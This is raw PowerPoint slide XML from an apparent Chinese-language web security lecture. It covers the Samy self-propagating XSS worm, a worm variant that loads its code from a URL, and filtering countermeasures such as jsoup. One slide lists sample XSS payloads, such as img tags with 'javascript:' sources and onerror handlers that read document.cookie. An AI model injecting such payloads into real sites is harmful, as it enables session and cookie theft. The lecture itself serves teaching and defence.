                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Access level of each field: 2 means public.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 237"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15169" y="5580380"/>
            <a:ext cx="9134693" cy="1416772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在他的个人资料中放置了这个自我传播的代码后，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的个人资料时，蠕虫得到执行并修改了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的个人资料，其中还放置了一个蠕虫代码的副本。 所以，访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的个人资料的任何用户也会以相同的方式受到感染。</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接连接符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87445510-618D-43AB-8544-9F3A4FE61075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3581400"/>
            <a:ext cx="3276600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9091100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Shape 241"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69848">
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>自我传播的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>: Link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="244" name="Shape 244"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2209800"/>
            <a:ext cx="5815726" cy="631563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Shape 245"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="2100125"/>
            <a:ext cx="3276600" cy="3540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457197" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>xssworm.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>将从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中获取。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>因此，我们不需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中包含所有的蠕虫代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在代码中，需要实现破坏和自我传播。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="246" name="Shape 246"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3048000"/>
            <a:ext cx="5815724" cy="1964025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21085712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Shape 250"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Shape 251"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>对策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>过滤方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317562" y="1676400"/>
            <a:ext cx="8520600" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571497" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>从用户输入中删除代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571497" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>由于有许多嵌入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>标签以外的代码的方法，所以很难实现。即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>脚本不仅仅会在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>的元素中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571497" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>使用可以过滤掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>代码的开源库。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857247" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>jsoup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    https://jsoup.org/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19730897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609600" y="304800"/>
            <a:ext cx="8305800" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>脚本不仅仅会在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>的元素中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="7772400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JavaScrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>作为方法存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>UR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>属性中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnSubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>典型用法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=“none” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=“alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
